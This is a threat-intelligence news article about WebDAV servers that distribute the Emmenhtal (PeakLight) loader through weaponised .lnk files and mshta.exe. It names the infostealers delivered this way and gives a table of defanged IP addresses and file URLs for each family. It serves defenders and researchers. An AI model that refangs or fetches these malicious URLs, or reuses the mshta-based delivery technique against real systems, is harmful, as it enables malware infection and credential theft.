A new method of attack has emerged that leverages WebDAV technology to host malicious files. This approach, which facilitates the distribution of the Emmenhtal loader—also known as PeakLight—has been under scrutiny since December 2023.
The loader is notorious for its stealthy, memory-only execution and its role in distributing various infostealers worldwide.
This article delves into the use of WebDAV for malicious purposes, the range of malware distributed through this infrastructure, and the potential for this setup to be part of a broader “Infrastructure-as-a-Service” (IaaS) offering to cybercriminals.
WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to manage files on web servers.
While it has legitimate applications in collaborative environments, cybercriminals have increasingly exploited it for malicious activities.
The Sekoia TDR team identified over 100 malicious WebDAV servers involved in distributing the Emmenhtal loader.
These servers host weaponized “.lnk” files designed to download further malicious payloads using “mshta.exe,” a legitimate Microsoft executable.
This method provides a high degree of stealth, as using trusted system binaries like “mshta.exe” helps bypass security controls.
Decoding Compliance: What CISOs Need to Know – Join Free Webinar
Separating the hosting server for initial “.lnk” files from the payload server complicates detection and attribution efforts.
Sekoia’s investigation revealed a diverse array of malware distributed through this infrastructure, highlighting its versatility.
Notable malware families include SelfAU3, DarkGate, Amadey, Lumma, Remcos, MeduzaStealer, DANABOT, ACR Stealer, Asyncrat, Stealit, Cryptbot, XWORM, and DEERSTEALER.
Each was delivered through WebDAV-hosted “.lnk” files with URLs adjusted to minimize direct exposure.
Table: Malware Families and Their Corresponding URLs
Malware Family | URL |
SelfAU3 | 91[.]92[.]251[.]35/Downloads/solaris-docs[.]lnk |
DarkGate | 206[.]188[.]196[.]28/Downloads/example[.]lnk |
Amadey | 147[.]45[.]79[.]82/Downloads/qqeng[.]pdf[.]lnk |
Lumma | 91[.]92[.]243[.]198:81/Downloads/test[.]lnk |
Remcos | 89[.]23[.]107[.]244/Downloads/Test[.]lnk |
MeduzaStealer | 94[.]156[.]64[.]74/Downloads/SecretTeachings[.]pdf[.]lnk |
DANABOT | 151[.]236[.]17[.]180/Wire%20Confirmation/WireConfirmation[.]pdf[.]lnk |
ACR Stealer | 62[.]133[.]61[.]104/Downloads/test[.]pdf[.]lnk |
Asyncrat | 62[.]133[.]61[.]101/Downloads/Invoice[.]pdf[.]lnk |
Stealit | 62[.]133[.]61[.]37/Downloads/config[.]txt[.]lnk |
Cryptbot | 89[.]23[.]103[.]56/Downloads/Videof/Full%20Video%20HD%20%281080p%29[.]lnk |
XWORM | 62[.]133[.]61[.]73/Downloads/Photo[.]lnk |
DEERSTEALER | 92[.]118[.]112[.]253/Downloads/releaseform.pdf.lnk |
The diversity of malware payloads suggests that this WebDAV infrastructure may be part of a more extensive cybercriminal operation offering IaaS to multiple threat actors.
Key observations supporting this hypothesis include:
The infrastructure supporting the Emmenhtal loader represents a sophisticated operation likely offered as a service to various cybercriminals.
Its ability to deliver multiple malware payloads while maintaining stealth underscores the evolving threat landscape in cybersecurity.
Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14-day free trial
A critical command injection vulnerability in the popular systeminformation npm package has recently been disclosed, exposing millions…
Researchers discovered a malware campaign targeting the npm ecosystem, distributing the Skuld info stealer through…
An investigation revealed an intrusion in Asia involving the BellaCiao .NET malware, as the initial…
A seemingly benign health app, "BMI CalculationVsn," was found on the Amazon App Store, which…
The Lazarus Group has recently employed a sophisticated attack, dubbed "Operation DreamJob," to target employees…
NodeStealer, initially a JavaScript-based malware, has evolved into a more sophisticated Python-based threat that targets…